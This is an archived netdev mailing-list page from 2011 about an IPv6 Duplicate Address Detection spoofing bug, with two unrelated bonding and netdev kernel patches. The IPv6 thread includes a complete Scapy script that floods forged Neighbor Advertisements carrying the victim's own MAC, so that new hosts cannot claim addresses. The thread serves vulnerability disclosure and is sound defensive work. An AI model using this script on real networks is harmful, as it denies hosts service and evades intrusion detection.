In-Reply-To: <1304774758.2821.1237.camel@edumazet-laptop>

On 05/07/2011 03:25 PM, Eric Dumazet wrote:
> Le samedi 07 mai 2011 à 15:17 +0200, Gervais Arthur a écrit :
>> On 05/07/2011 03:10 PM, Eric Dumazet wrote:
>>> Le samedi 07 mai 2011 à 14:55 +0200, Jan Ceuleers a écrit :
>>>> The networking folks are on netdev
>>>>
>>>> -------- Original Message --------
>>>> Subject: PROBLEM: IPv6 Duplicate Address Detection with non
RFC-conform
>>>> ICMPv6 packets
>>>> Date: Thu, 05 May 2011 11:52:05 +0200
>>>> From: Gervais Arthur<arthur.gervais@insa-lyon.fr>
>>>> To:<linux-kernel@vger.kernel.org>
>>>> CC:<arthur.gervais@insa-lyon.fr>
>>>>
>>>> [1.] One line summary of the problem:
>>>>
>>>> A specially crafted Ethernet ICMPv6 packet which is not conform to
the
>>>> RFC can perform a IPv6 Duplicate Address Detection Failure.
>>>>
>>>> [2.] Full description of the problem/report:
>>>>
>>>> If a new IPv6 node joins the local area network, the new node sends
an
>>>> ICMPv6 Neighbor Solicitation packet in order to check if the
>>>> self-generated local-link IPv6 address already occupied is.
>>>>
>>>> An attacker can answer to this Neighbor Solicitation packet with an
>>>> ICMPv6 Neighbor Advertisement packet, so that the new IPv6 node is
not
>>>> able to associate the just generated IPv6 address.
>>>> -- This problem is well known and IPv6 related.
>>>>
>>>> The new problem is that the attacker can modify the Ethernet Neighbor
>>>> Advertisement packets, so that they are not RFC conform and so that
it
>>>> is even more difficult to detect the attacker.
>>>>
>>>> If an attacker sends the following packet, duplicate address
detection
>>>> fails on Linux:
>>>>
>>>> Ethernet Layer: 	Victim MAC -->   Victim MAC
>>>> IPv6 Layer:		fe80::200:edff:feXX:XXXX -->   ff02::1
>>>> 			ICMPv6
>>>> 			  Type 136 (Neighbor Advertisement)
>>>> 			  Target: fe80::200:edff:feXX:XXXX
>>>> 			ICMPv6 Option
>>>> 			  Type 2 (Target link-layer address) Victim MAC
>>>>
>>>> Please find attached a drawing and a proof of concept.
>>>>
>>>> [3.] Keywords (i.e., modules, networking, kernel):
>>>>
>>>> Network, IPv6, Duplicate Address Detection
>>>>
>>>> [4.] Kernel version (from /proc/version):
>>>>
>>>> Latest tested:
>>>> Linux version 2.6.35-22-generic (buildd@rothera) (gcc version 4.4.5
>>>> (Ubuntu/Linaro 4.4.4-14ubuntu4) ) #33-Ubuntu SMP Sun Sep 19 20:34:50
>> UTC
>>>> 2010
>>>> (and before most probably)
>>>>
>>>> [6.] A small shell script or example program which triggers the
>>>>          problem (if possible)
>>>>
>>>> Please find attached a python script demonstrating the problem.
>>>>
>>>> [X.] Other notes, patches, fixes, workarounds:
>>>>
>>>> The Linux Kernel should not accept incoming Ethernet packets
>> originating
>>>> from an internal Ethernet card (identified by the MAC address)
>>>>
>>>
>>> I fail to understand the problem.
>>>
>>> The attacker might use any kind of source MAC address to fool 'Victim'
>>> or 'network admins'
>>>
>>> Why one particular address should be avoided ?
>>>
>>>
>>>
>>
>> Currently the IPv6 implementation says (from the victims view):
>> I send a Neighbor Solicitation for a given IPv6 address to check the
>> duplicate address detection.
>>
>> If I then receive a Neighbor Advertisement packet from my MAC address,
>> to my MAC address, with ICMPv6 target option my MAC address, then the
>> requested IPv6 address must already be used and I cannot take it.
>>
>> I think such a packet should never be allowed to be accepted, because
>> the victim just asked if the address is free.
>>
>> If such a packet is accepted, it is even more difficult to find the
>> attacker.
>>
>

If the network administrator is using some IDS like NDPMon 
(http://ndpmon.sourceforge.net/) to detect a DAD DoS attacks, and the 
attacker changes the MAC address like I described, it will not detect 
the DAD DoS attack anymore (because the victim itself claims already 
having the IPv6 address).

> What prevents the attacker to use random source Mac addresses,
> or using legit ones learnt from packet sniffing ?
>

Of course an attacker could use a random source Mac address, or any 
other already existing source Mac address from the network, but the IDS 
system will know (depending on how it works), that this Mac address has 
not this IPv6 address associated and therefore a DAD DoS is happening.

> Why only one given mac address is to be avoided, out of billions other ?
>

Why would the victim itself claim already having the IPv6 address?

> This would be a strange precedent. Practically nowhere we check incoming
> mac addresses from incoming packets. (only on netfilter it can be
> optionally done)
>

Yes I understand this point. But there is not only the source Mac 
address from the Ethernet frame, it is also the "target link-layer 
address" in the ICMPv6 Option which is related to this case.

> If you have a host with say one thousand NICS, should we make sure the
> packet we receive has not one of the thousand mac addresses we currently
> have on this host ?

I send the bug to this list, because I don't think this is a NDPMon 
specific problem. Windows for example does not accept the packets the 
way I described.

Maybe this is not an OS-specific problem, but attacks would be easier to 
detect, if those packets would not be accepted.


^ permalink raw reply

* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Eric Dumazet @ 2011-05-07 13:25 UTC (permalink / raw)
  To: Gervais Arthur; +Cc: Jan Ceuleers, netdev
In-Reply-To: <dc9a790de083b31ff85c0b9578c980e7@mail.insa-lyon.fr>

Le samedi 07 mai 2011 à 15:17 +0200, Gervais Arthur a écrit :
> On 05/07/2011 03:10 PM, Eric Dumazet wrote:
> > Le samedi 07 mai 2011 à 14:55 +0200, Jan Ceuleers a écrit :
> >> The networking folks are on netdev
> >>
> >> -------- Original Message --------
> >> Subject: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform
> >> ICMPv6 packets
> >> Date: Thu, 05 May 2011 11:52:05 +0200
> >> From: Gervais Arthur<arthur.gervais@insa-lyon.fr>
> >> To:<linux-kernel@vger.kernel.org>
> >> CC:<arthur.gervais@insa-lyon.fr>
> >>
> >> [1.] One line summary of the problem:
> >>
> >> A specially crafted Ethernet ICMPv6 packet which is not conform to the
> >> RFC can perform a IPv6 Duplicate Address Detection Failure.
> >>
> >> [2.] Full description of the problem/report:
> >>
> >> If a new IPv6 node joins the local area network, the new node sends an
> >> ICMPv6 Neighbor Solicitation packet in order to check if the
> >> self-generated local-link IPv6 address already occupied is.
> >>
> >> An attacker can answer to this Neighbor Solicitation packet with an
> >> ICMPv6 Neighbor Advertisement packet, so that the new IPv6 node is not
> >> able to associate the just generated IPv6 address.
> >> -- This problem is well known and IPv6 related.
> >>
> >> The new problem is that the attacker can modify the Ethernet Neighbor
> >> Advertisement packets, so that they are not RFC conform and so that it
> >> is even more difficult to detect the attacker.
> >>
> >> If an attacker sends the following packet, duplicate address detection
> >> fails on Linux:
> >>
> >> Ethernet Layer: 	Victim MAC -->  Victim MAC
> >> IPv6 Layer:		fe80::200:edff:feXX:XXXX -->  ff02::1
> >> 			ICMPv6
> >> 			  Type 136 (Neighbor Advertisement)
> >> 			  Target: fe80::200:edff:feXX:XXXX
> >> 			ICMPv6 Option
> >> 			  Type 2 (Target link-layer address) Victim MAC
> >>
> >> Please find attached a drawing and a proof of concept.
> >>
> >> [3.] Keywords (i.e., modules, networking, kernel):
> >>
> >> Network, IPv6, Duplicate Address Detection
> >>
> >> [4.] Kernel version (from /proc/version):
> >>
> >> Latest tested:
> >> Linux version 2.6.35-22-generic (buildd@rothera) (gcc version 4.4.5
> >> (Ubuntu/Linaro 4.4.4-14ubuntu4) ) #33-Ubuntu SMP Sun Sep 19 20:34:50
> UTC
> >> 2010
> >> (and before most probably)
> >>
> >> [6.] A small shell script or example program which triggers the
> >>         problem (if possible)
> >>
> >> Please find attached a python script demonstrating the problem.
> >>
> >> [X.] Other notes, patches, fixes, workarounds:
> >>
> >> The Linux Kernel should not accept incoming Ethernet packets
> originating
> >> from an internal Ethernet card (identified by the MAC address)
> >>
> >
> > I fail to understand the problem.
> >
> > The attacker might use any kind of source MAC address to fool 'Victim'
> > or 'network admins'
> >
> > Why one particular address should be avoided ?
> >
> >
> >
> 
> Currently the IPv6 implementation says (from the victims view):
> I send a Neighbor Solicitation for a given IPv6 address to check the 
> duplicate address detection.
> 
> If I then receive a Neighbor Advertisement packet from my MAC address, 
> to my MAC address, with ICMPv6 target option my MAC address, then the 
> requested IPv6 address must already be used and I cannot take it.
> 
> I think such a packet should never be allowed to be accepted, because 
> the victim just asked if the address is free.
> 
> If such a packet is accepted, it is even more difficult to find the 
> attacker.
> 

What prevents the attacker to use random source Mac addresses,
or using legit ones learnt from packet sniffing ?

Why only one given mac address is to be avoided, out of billions other ?

This would be a strange precedent. Practically nowhere we check incoming
mac addresses from incoming packets. (only on netfilter it can be
optionally done)

If you have a host with say one thousand NICS, should we make sure the
packet we receive has not one of the thousand mac addresses we currently
have on this host ?




^ permalink raw reply

* [PATCH v2] bonding: convert to ndo_fix_features
From: Michał Mirosław @ 2011-05-07 13:22 UTC (permalink / raw)
  To: netdev; +Cc: Jay Vosburgh, Andy Gospodarek
In-Reply-To: <20110506175629.BC59D1389B@rere.qmqm.pl>

This should also fix updating of vlan_features and propagating changes to
VLAN devices on the bond.

Side effect: it allows user to force-disable some offloads on the bond                                    
interface.                                                                                                
                                                                                                          
Note: NETIF_F_VLAN_CHALLENGED is managed by bond_fix_features() now.                                      

Signed-off-by: Michał Mirosław <mirq-linux@rere.qmqm.pl>
---

Note: Depends on netdev_change_features() patch.

v2:	- use netdev_change_features()
	- fix locking around bond_compute_features()

 drivers/net/bonding/bond_main.c |  161 ++++++++++++++++----------------------
 1 files changed, 68 insertions(+), 93 deletions(-)

diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
index 9a5feaf..36ff316 100644
--- a/drivers/net/bonding/bond_main.c
+++ b/drivers/net/bonding/bond_main.c
@@ -344,32 +344,6 @@ out:
 }
 
 /**
- * bond_has_challenged_slaves
- * @bond: the bond we're working on
- *
- * Searches the slave list. Returns 1 if a vlan challenged slave
- * was found, 0 otherwise.
- *
- * Assumes bond->lock is held.
- */
-static int bond_has_challenged_slaves(struct bonding *bond)
-{
-	struct slave *slave;
-	int i;
-
-	bond_for_each_slave(bond, slave, i) {
-		if (slave->dev->features & NETIF_F_VLAN_CHALLENGED) {
-			pr_debug("found VLAN challenged slave - %s\n",
-				 slave->dev->name);
-			return 1;
-		}
-	}
-
-	pr_debug("no VLAN challenged slaves found\n");
-	return 0;
-}
-
-/**
  * bond_next_vlan - safely skip to the next item in the vlans list.
  * @bond: the bond we're working on
  * @curr: item we're advancing from
@@ -1406,52 +1380,68 @@ static int bond_sethwaddr(struct net_device *bond_dev,
 	return 0;
 }
 
-#define BOND_VLAN_FEATURES \
-	(NETIF_F_VLAN_CHALLENGED | NETIF_F_HW_VLAN_RX | NETIF_F_HW_VLAN_TX | \
-	 NETIF_F_HW_VLAN_FILTER)
-
-/*
- * Compute the common dev->feature set available to all slaves.  Some
- * feature bits are managed elsewhere, so preserve those feature bits
- * on the master device.
- */
-static int bond_compute_features(struct bonding *bond)
+static u32 bond_fix_features(struct net_device *dev, u32 features)
 {
 	struct slave *slave;
-	struct net_device *bond_dev = bond->dev;
-	u32 features = bond_dev->features;
-	u32 vlan_features = 0;
-	unsigned short max_hard_header_len = max((u16)ETH_HLEN,
-						bond_dev->hard_header_len);
+	struct bonding *bond = netdev_priv(dev);
+	u32 mask;
 	int i;
 
-	features &= ~(NETIF_F_ALL_CSUM | BOND_VLAN_FEATURES);
-	features |=  NETIF_F_GSO_MASK | NETIF_F_NO_CSUM | NETIF_F_NOCACHE_COPY;
+	read_lock(&bond->lock);
 
-	if (!bond->first_slave)
-		goto done;
+	if (!bond->first_slave) {
+		/* Disable adding VLANs to empty bond. But why? --mq */
+		features |= NETIF_F_VLAN_CHALLENGED;
+		goto out;
+	}
 
+	mask = features;
 	features &= ~NETIF_F_ONE_FOR_ALL;
+	features |= NETIF_F_ALL_FOR_ALL;
 
-	vlan_features = bond->first_slave->dev->vlan_features;
 	bond_for_each_slave(bond, slave, i) {
 		features = netdev_increment_features(features,
 						     slave->dev->features,
-						     NETIF_F_ONE_FOR_ALL);
+						     mask);
+	}
+
+out:
+	read_unlock(&bond->lock);
+	return features;
+}
+
+#define BOND_VLAN_FEATURES	(NETIF_F_ALL_TX_OFFLOADS | \
+				 NETIF_F_SOFT_FEATURES | \
+				 NETIF_F_LRO)
+
+static void bond_compute_features(struct bonding *bond)
+{
+	struct slave *slave;
+	struct net_device *bond_dev = bond->dev;
+	u32 vlan_features = BOND_VLAN_FEATURES;
+	unsigned short max_hard_header_len = ETH_HLEN;
+	int i;
+
+	read_lock(&bond->lock);
+
+	if (!bond->first_slave)
+		goto done;
+
+	bond_for_each_slave(bond, slave, i) {
 		vlan_features = netdev_increment_features(vlan_features,
-							slave->dev->vlan_features,
-							NETIF_F_ONE_FOR_ALL);
+			slave->dev->vlan_features, BOND_VLAN_FEATURES);
+
 		if (slave->dev->hard_header_len > max_hard_header_len)
 			max_hard_header_len = slave->dev->hard_header_len;
 	}
 
 done:
-	features |= (bond_dev->features & BOND_VLAN_FEATURES);
-	bond_dev->features = netdev_fix_features(bond_dev, features);
-	bond_dev->vlan_features = netdev_fix_features(bond_dev, vlan_features);
+	bond_dev->vlan_features = vlan_features;
 	bond_dev->hard_header_len = max_hard_header_len;
 
-	return 0;
+	read_unlock(&bond->lock);
+
+	netdev_change_features(bond_dev);
 }
 
 static void bond_setup_by_slave(struct net_device *bond_dev,
@@ -1544,7 +1534,6 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev)
 	struct netdev_hw_addr *ha;
 	struct sockaddr addr;
 	int link_reporting;
-	int old_features = bond_dev->features;
 	int res = 0;
 
 	if (!bond->params.use_carrier && slave_dev->ethtool_ops == NULL &&
@@ -1577,16 +1566,9 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev)
 			pr_warning("%s: Warning: enslaved VLAN challenged slave %s. Adding VLANs will be blocked as long as %s is part of bond %s\n",
 				   bond_dev->name, slave_dev->name,
 				   slave_dev->name, bond_dev->name);
-			bond_dev->features |= NETIF_F_VLAN_CHALLENGED;
 		}
 	} else {
 		pr_debug("%s: ! NETIF_F_VLAN_CHALLENGED\n", slave_dev->name);
-		if (bond->slave_cnt == 0) {
-			/* First slave, and it is not VLAN challenged,
-			 * so remove the block of adding VLANs over the bond.
-			 */
-			bond_dev->features &= ~NETIF_F_VLAN_CHALLENGED;
-		}
 	}
 
 	/*
@@ -1775,10 +1757,10 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev)
 	new_slave->delay = 0;
 	new_slave->link_failure_count = 0;
 
-	bond_compute_features(bond);
-
 	write_unlock_bh(&bond->lock);
 
+	bond_compute_features(bond);
+
 	read_lock(&bond->lock);
 
 	new_slave->last_arp_rx = jiffies;
@@ -1958,7 +1940,7 @@ err_free:
 	kfree(new_slave);
 
 err_undo_flags:
-	bond_dev->features = old_features;
+	bond_compute_features(bond);
 
 	return res;
 }
@@ -1979,6 +1961,7 @@ int bond_release(struct net_device *bond_dev, struct net_device *slave_dev)
 	struct bonding *bond = netdev_priv(bond_dev);
 	struct slave *slave, *oldcurrent;
 	struct sockaddr addr;
+	u32 old_features = bond_dev->features;
 
 	/* slave is not a slave or master is not master of this slave */
 	if (!(slave_dev->flags & IFF_SLAVE) ||
@@ -2039,8 +2022,6 @@ int bond_release(struct net_device *bond_dev, struct net_device *slave_dev)
 	/* release the slave from its bond */
 	bond_detach_slave(bond, slave);
 
-	bond_compute_features(bond);
-
 	if (bond->primary_slave == slave)
 		bond->primary_slave = NULL;
 
@@ -2084,23 +2065,22 @@ int bond_release(struct net_device *bond_dev, struct net_device *slave_dev)
 		 */
 		memset(bond_dev->dev_addr, 0, bond_dev->addr_len);
 
-		if (!bond->vlgrp) {
-			bond_dev->features |= NETIF_F_VLAN_CHALLENGED;
-		} else {
+		if (bond->vlgrp) {
 			pr_warning("%s: Warning: clearing HW address of %s while it still has VLANs.\n",
 				   bond_dev->name, bond_dev->name);
 			pr_warning("%s: When re-adding slaves, make sure the bond's HW address matches its VLANs'.\n",
 				   bond_dev->name);
 		}
-	} else if ((bond_dev->features & NETIF_F_VLAN_CHALLENGED) &&
-		   !bond_has_challenged_slaves(bond)) {
+	}
+
+	write_unlock_bh(&bond->lock);
+	unblock_netpoll_tx();
+
+	bond_compute_features(bond);
+	if (!(bond_dev->features & NETIF_F_VLAN_CHALLENGED) &&
+	    (old_features & NETIF_F_VLAN_CHALLENGED))
 		pr_info("%s: last VLAN challenged slave %s left bond %s. VLAN blocking is removed\n",
 			bond_dev->name, slave_dev->name, bond_dev->name);
-		bond_dev->features &= ~NETIF_F_VLAN_CHALLENGED;
-	}
-
-	write_unlock_bh(&bond->lock);
-	unblock_netpoll_tx();
 
 	/* must do this from outside any spinlocks */
 	bond_destroy_slave_symlinks(bond_dev, slave_dev);
@@ -2219,8 +2199,6 @@ static int bond_release_all(struct net_device *bond_dev)
 			bond_alb_deinit_slave(bond, slave);
 		}
 
-		bond_compute_features(bond);
-
 		bond_destroy_slave_symlinks(bond_dev, slave_dev);
 		bond_del_vlans_from_slave(bond, slave_dev);
 
@@ -2269,9 +2247,7 @@ static int bond_release_all(struct net_device *bond_dev)
 	 */
 	memset(bond_dev->dev_addr, 0, bond_dev->addr_len);
 
-	if (!bond->vlgrp) {
-		bond_dev->features |= NETIF_F_VLAN_CHALLENGED;
-	} else {
+	if (bond->vlgrp) {
 		pr_warning("%s: Warning: clearing HW address of %s while it still has VLANs.\n",
 			   bond_dev->name, bond_dev->name);
 		pr_warning("%s: When re-adding slaves, make sure the bond's HW address matches its VLANs'.\n",
@@ -2282,6 +2258,9 @@ static int bond_release_all(struct net_device *bond_dev)
 
 out:
 	write_unlock_bh(&bond->lock);
+
+	bond_compute_features(bond);
+
 	return 0;
 }
 
@@ -4347,11 +4326,6 @@ static void bond_ethtool_get_drvinfo(struct net_device *bond_dev,
 static const struct ethtool_ops bond_ethtool_ops = {
 	.get_drvinfo		= bond_ethtool_get_drvinfo,
 	.get_link		= ethtool_op_get_link,
-	.get_tx_csum		= ethtool_op_get_tx_csum,
-	.get_sg			= ethtool_op_get_sg,
-	.get_tso		= ethtool_op_get_tso,
-	.get_ufo		= ethtool_op_get_ufo,
-	.get_flags		= ethtool_op_get_flags,
 };
 
 static const struct net_device_ops bond_netdev_ops = {
@@ -4377,6 +4351,7 @@ static const struct net_device_ops bond_netdev_ops = {
 #endif
 	.ndo_add_slave		= bond_enslave,
 	.ndo_del_slave		= bond_release,
+	.ndo_fix_features	= bond_fix_features,
 };
 
 static void bond_destructor(struct net_device *bond_dev)
@@ -4432,14 +4407,14 @@ static void bond_setup(struct net_device *bond_dev)
 	 * when there are slaves that are not hw accel
 	 * capable
 	 */
-	bond_dev->features |= (NETIF_F_HW_VLAN_TX |
-			       NETIF_F_HW_VLAN_RX |
-			       NETIF_F_HW_VLAN_FILTER);
 
-	/* By default, we enable GRO on bonding devices.
-	 * Actual support requires lowlevel drivers are GRO ready.
-	 */
-	bond_dev->features |= NETIF_F_GRO;
+	bond_dev->hw_features = BOND_VLAN_FEATURES |
+				NETIF_F_HW_VLAN_TX |
+				NETIF_F_HW_VLAN_RX |
+				NETIF_F_HW_VLAN_FILTER;
+
+	bond_dev->hw_features &= ~(NETIF_F_ALL_CSUM & ~NETIF_F_NO_CSUM);
+	bond_dev->features |= bond_dev->hw_features;
 }
 
 static void bond_work_cancel_all(struct bonding *bond)
-- 
1.7.2.5


^ permalink raw reply related

* [PATCH] net: introduce netdev_change_features()
From: Michał Mirosław @ 2011-05-07 13:22 UTC (permalink / raw)
  To: netdev

It will be needed by bonding and other drivers changing vlan_features
after ndo_init callback.

As a bonus, this includes kernel-doc for netdev_update_features().

Signed-off-by: Michał Mirosław <mirq-linux@rere.qmqm.pl>
---
 include/linux/netdevice.h |    1 +
 net/core/dev.c            |   25 +++++++++++++++++++++++++
 2 files changed, 26 insertions(+), 0 deletions(-)

diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index d5de66a..686af72 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -2560,6 +2560,7 @@ u32 netdev_increment_features(u32 all, u32 one, u32 mask);
 u32 netdev_fix_features(struct net_device *dev, u32 features);
 int __netdev_update_features(struct net_device *dev);
 void netdev_update_features(struct net_device *dev);
+void netdev_change_features(struct net_device *dev);
 
 void netif_stacked_transfer_operstate(const struct net_device *rootdev,
 					struct net_device *dev);
diff --git a/net/core/dev.c b/net/core/dev.c
index 44ef8f8..c91d14c 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -5287,6 +5287,14 @@ int __netdev_update_features(struct net_device *dev)
 	return 1;
 }
 
+/**
+ *	netdev_update_features - recalculate device features
+ *	@dev: the device to check
+ *
+ *	Recalculate dev->features set and send notifications if it
+ *	has changed. Should be called after driver or hardware dependent
+ *	conditions might have changed that influence the features.
+ */
 void netdev_update_features(struct net_device *dev)
 {
 	if (__netdev_update_features(dev))
@@ -5295,6 +5303,23 @@ void netdev_update_features(struct net_device *dev)
 EXPORT_SYMBOL(netdev_update_features);
 
 /**
+ *	netdev_change_features - recalculate device features
+ *	@dev: the device to check
+ *
+ *	Recalculate dev->features set and send notifications even
+ *	if they have not changed. Should be called instead of
+ *	netdev_update_features() if also dev->vlan_features might
+ *	have changed to allow the changes to be propagated to stacked
+ *	VLAN devices.
+ */
+void netdev_change_features(struct net_device *dev)
+{
+	__netdev_update_features(dev);
+	netdev_features_change(dev);
+}
+EXPORT_SYMBOL(netdev_change_features);
+
+/**
  *	netif_stacked_transfer_operstate -	transfer operstate
  *	@rootdev: the root or lower level device to transfer state from
  *	@dev: the device to transfer operstate to
-- 
1.7.2.5


^ permalink raw reply related

* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Gervais Arthur @ 2011-05-07 13:05 UTC (permalink / raw)
  To: netdev
In-Reply-To: <4DC54157.9010306@computer.org>

[-- Attachment #1: Type: text/plain, Size: 2499 bytes --]

I made a small mistake in the proof of concept code.

Please find attached the corrected version (2 lines are modified)

Best regards,

Arthur Gervais


On 05/07/2011 02:55 PM, Jan Ceuleers wrote:
> The networking folks are on netdev
>
> -------- Original Message --------
> Subject: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform
> ICMPv6 packets
> Date: Thu, 05 May 2011 11:52:05 +0200
> From: Gervais Arthur <arthur.gervais@insa-lyon.fr>
> To: <linux-kernel@vger.kernel.org>
> CC: <arthur.gervais@insa-lyon.fr>
>
> [1.] One line summary of the problem:
>
> A specially crafted Ethernet ICMPv6 packet which is not conform to the
> RFC can perform a IPv6 Duplicate Address Detection Failure.
>
> [2.] Full description of the problem/report:
>
> If a new IPv6 node joins the local area network, the new node sends an
> ICMPv6 Neighbor Solicitation packet in order to check if the
> self-generated local-link IPv6 address already occupied is.
>
> An attacker can answer to this Neighbor Solicitation packet with an
> ICMPv6 Neighbor Advertisement packet, so that the new IPv6 node is not
> able to associate the just generated IPv6 address.
> -- This problem is well known and IPv6 related.
>
> The new problem is that the attacker can modify the Ethernet Neighbor
> Advertisement packets, so that they are not RFC conform and so that it
> is even more difficult to detect the attacker.
>
> If an attacker sends the following packet, duplicate address detection
> fails on Linux:
>
> Ethernet Layer: Victim MAC --> Victim MAC
> IPv6 Layer: fe80::200:edff:feXX:XXXX --> ff02::1
> ICMPv6
> Type 136 (Neighbor Advertisement)
> Target: fe80::200:edff:feXX:XXXX
> ICMPv6 Option
> Type 2 (Target link-layer address) Victim MAC
>
> Please find attached a drawing and a proof of concept.
>
> [3.] Keywords (i.e., modules, networking, kernel):
>
> Network, IPv6, Duplicate Address Detection
>
> [4.] Kernel version (from /proc/version):
>
> Latest tested:
> Linux version 2.6.35-22-generic (buildd@rothera) (gcc version 4.4.5
> (Ubuntu/Linaro 4.4.4-14ubuntu4) ) #33-Ubuntu SMP Sun Sep 19 20:34:50 UTC
> 2010
> (and before most probably)
>
> [6.] A small shell script or example program which triggers the
> problem (if possible)
>
> Please find attached a python script demonstrating the problem.
>
> [X.] Other notes, patches, fixes, workarounds:
>
> The Linux Kernel should not accept incoming Ethernet packets originating
> from an internal Ethernet card (identified by the MAC address)
>


[-- Attachment #2: dad-dos_special.py --]
[-- Type: text/x-python, Size: 974 bytes --]

#! /usr/bin/env python

import sys
from multiprocessing import Process
from scapy.all import *

def f(pkt):
        sendp(pkt, loop=1, inter=1)

def callback(pkt):
        
        if IPv6 in pkt and ICMPv6ND_NS in pkt:  
                
			src_mac=pkt.sprintf("%Ether.src%")   # Source Adresse
			src=pkt.sprintf("%IPv6.src%")   # Source Adresse
			dst=pkt.sprintf("%IPv6.dst%")   # Destination Adresse
			tgt=pkt.sprintf("%ICMPv6ND_NS.tgt%")    # Target adresse 

			if src=="::" and "ff02::1:ff" in dst:

				eth = Ether(src=src_mac,dst=src_mac)
				ip = IPv6(src=tgt,dst="ff02::1")
				icmp = ICMPv6ND_NA(tgt=tgt)
				icmpOpt = ICMPv6NDOptDstLLAddr(lladdr=src_mac)

				packet = eth/ip/icmp/icmpOpt

				p = Process(target=f, args=(packet,))
				p.start()

def main():
        conf.iface6="eth1"
        try:
                scapy.sendrecv.sniff(prn=callback,store=0)
        except KeyboardInterrupt:
                exit(0)

if __name__ == "__main__":
        main()

^ permalink raw reply

* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Gervais Arthur @ 2011-05-07 13:17 UTC (permalink / raw)
  To: Eric Dumazet; +Cc: Jan Ceuleers, netdev
In-Reply-To: <1304773802.2821.1214.camel@edumazet-laptop>

On 05/07/2011 03:10 PM, Eric Dumazet wrote:
> Le samedi 07 mai 2011 à 14:55 +0200, Jan Ceuleers a écrit :
>> The networking folks are on netdev
>>
>> -------- Original Message --------
>> Subject: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform
>> ICMPv6 packets
>> Date: Thu, 05 May 2011 11:52:05 +0200
>> From: Gervais Arthur<arthur.gervais@insa-lyon.fr>
>> To:<linux-kernel@vger.kernel.org>
>> CC:<arthur.gervais@insa-lyon.fr>
>>
>> [1.] One line summary of the problem:
>>
>> A specially crafted Ethernet ICMPv6 packet which is not conform to the
>> RFC can perform a IPv6 Duplicate Address Detection Failure.
>>
>> [2.] Full description of the problem/report:
>>
>> If a new IPv6 node joins the local area network, the new node sends an
>> ICMPv6 Neighbor Solicitation packet in order to check if the
>> self-generated local-link IPv6 address already occupied is.
>>
>> An attacker can answer to this Neighbor Solicitation packet with an
>> ICMPv6 Neighbor Advertisement packet, so that the new IPv6 node is not
>> able to associate the just generated IPv6 address.
>> -- This problem is well known and IPv6 related.
>>
>> The new problem is that the attacker can modify the Ethernet Neighbor
>> Advertisement packets, so that they are not RFC conform and so that it
>> is even more difficult to detect the attacker.
>>
>> If an attacker sends the following packet, duplicate address detection
>> fails on Linux:
>>
>> Ethernet Layer: 	Victim MAC -->  Victim MAC
>> IPv6 Layer:		fe80::200:edff:feXX:XXXX -->  ff02::1
>> 			ICMPv6
>> 			  Type 136 (Neighbor Advertisement)
>> 			  Target: fe80::200:edff:feXX:XXXX
>> 			ICMPv6 Option
>> 			  Type 2 (Target link-layer address) Victim MAC
>>
>> Please find attached a drawing and a proof of concept.
>>
>> [3.] Keywords (i.e., modules, networking, kernel):
>>
>> Network, IPv6, Duplicate Address Detection
>>
>> [4.] Kernel version (from /proc/version):
>>
>> Latest tested:
>> Linux version 2.6.35-22-generic (buildd@rothera) (gcc version 4.4.5
>> (Ubuntu/Linaro 4.4.4-14ubuntu4) ) #33-Ubuntu SMP Sun Sep 19 20:34:50
UTC
>> 2010
>> (and before most probably)
>>
>> [6.] A small shell script or example program which triggers the
>>         problem (if possible)
>>
>> Please find attached a python script demonstrating the problem.
>>
>> [X.] Other notes, patches, fixes, workarounds:
>>
>> The Linux Kernel should not accept incoming Ethernet packets
originating
>> from an internal Ethernet card (identified by the MAC address)
>>
>
> I fail to understand the problem.
>
> The attacker might use any kind of source MAC address to fool 'Victim'
> or 'network admins'
>
> Why one particular address should be avoided ?
>
>
>

Currently the IPv6 implementation says (from the victims view):
I send a Neighbor Solicitation for a given IPv6 address to check the 
duplicate address detection.

If I then receive a Neighbor Advertisement packet from my MAC address, 
to my MAC address, with ICMPv6 target option my MAC address, then the 
requested IPv6 address must already be used and I cannot take it.

I think such a packet should never be allowed to be accepted, because 
the victim just asked if the address is free.

If such a packet is accepted, it is even more difficult to find the 
attacker.


^ permalink raw reply

* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Eric Dumazet @ 2011-05-07 13:10 UTC (permalink / raw)
  To: Jan Ceuleers; +Cc: netdev, Gervais Arthur
In-Reply-To: <4DC54157.9010306@computer.org>

Le samedi 07 mai 2011 à 14:55 +0200, Jan Ceuleers a écrit :
> The networking folks are on netdev
> 
> -------- Original Message --------
> Subject: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform 
> ICMPv6 packets
> Date: Thu, 05 May 2011 11:52:05 +0200
> From: Gervais Arthur <arthur.gervais@insa-lyon.fr>
> To: <linux-kernel@vger.kernel.org>
> CC: <arthur.gervais@insa-lyon.fr>
> 
> [1.] One line summary of the problem:
> 
> A specially crafted Ethernet ICMPv6 packet which is not conform to the
> RFC can perform a IPv6 Duplicate Address Detection Failure.
> 
> [2.] Full description of the problem/report:
> 
> If a new IPv6 node joins the local area network, the new node sends an
> ICMPv6 Neighbor Solicitation packet in order to check if the
> self-generated local-link IPv6 address already occupied is.
> 
> An attacker can answer to this Neighbor Solicitation packet with an
> ICMPv6 Neighbor Advertisement packet, so that the new IPv6 node is not
> able to associate the just generated IPv6 address.
> -- This problem is well known and IPv6 related.
> 
> The new problem is that the attacker can modify the Ethernet Neighbor
> Advertisement packets, so that they are not RFC conform and so that it
> is even more difficult to detect the attacker.
> 
> If an attacker sends the following packet, duplicate address detection
> fails on Linux:
> 
> Ethernet Layer: 	Victim MAC --> Victim MAC
> IPv6 Layer:		fe80::200:edff:feXX:XXXX --> ff02::1
> 			ICMPv6
